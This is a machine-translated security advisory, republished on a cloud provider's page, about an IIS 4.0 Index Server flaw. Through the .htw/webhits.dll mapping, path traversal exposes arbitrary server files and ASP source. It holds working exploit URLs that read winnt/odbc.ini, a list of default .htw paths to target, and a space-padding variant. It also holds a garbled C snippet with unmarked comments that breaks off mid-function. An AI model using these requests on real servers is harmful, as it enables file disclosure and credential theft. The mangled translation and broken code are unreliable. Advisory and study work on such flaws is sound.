Involving procedures:
Microsoft Internet Information Server/index Server
Describe:
Shock security Discovery: New vulnerabilities allow viewing of any file on the Web server including ASP source
With:
IIS4.0 has an application mapping HTW--->webhits.dll, which is used for the click function of Index Server. Although you are not running index Server, the map
The shot still works. This application mapping has vulnerabilities that allow intruders to read files on local hard drives, database files, and ASP source code!
There are two ways to do this, first, if you have a file with a. htw suffix on your Web server, you can view the contents of the file in the following ways, such as viewing
Contents of Odbc.ini File:
Http://www.xxx.com/iissamples/issamples/oop/qfullhit.htw?
ciwebhitsfile=/.. /.. /winnt/odbc.ini&cirestriction=none&cihilitetype=full
For the general installation mode of IIS, you can find the. htw file in the following locations:
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/iissamples/exair/search/qfullhit.htw
/iissamples/exair/search/qsumrhit.htw
/iishelp/iis/misc/iirturnh.htw
Second, if the file does not exist on your Web server, the vulnerable system still allows the user to invoke Webhits.dll, as follows:
Http://www.xxx.com/default.htm%20%20%20%20%20.htw?
ciwebhitsfile=/.. /.. /winnt/odbc.ini&cirestriction=none&cihilitetype=full
The condition is that the Default.htm must exist. This file name can be another file, but it must exist. Webhits.dll will open the file as a temporary file. When the
When the spaces%20 in the URL reaches a certain number, the identification function of the Web service may be problematic so that Webhits.dll will open the specified file
Winntodbc.ini. If successful, you can open more files, including ASP code, in the same way. For the approximate principle, see the following code:
FILE *FD;
int doestemplateexist (char *pathtohtwfile)
{
Just in case inetinfo.exe passes too long a string
Let's make sure it ' s of the A suitable length and not
Going to open a buffer overrun vulnerability
Char *file;
FILE = (char *) malloc (250);
strncpy (file,pathtohtwfile,250);
FD = fopen (file, "R");
Success
if (FD!=null)
{
return 1;
}
Failed
Else
{
return 0;
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.
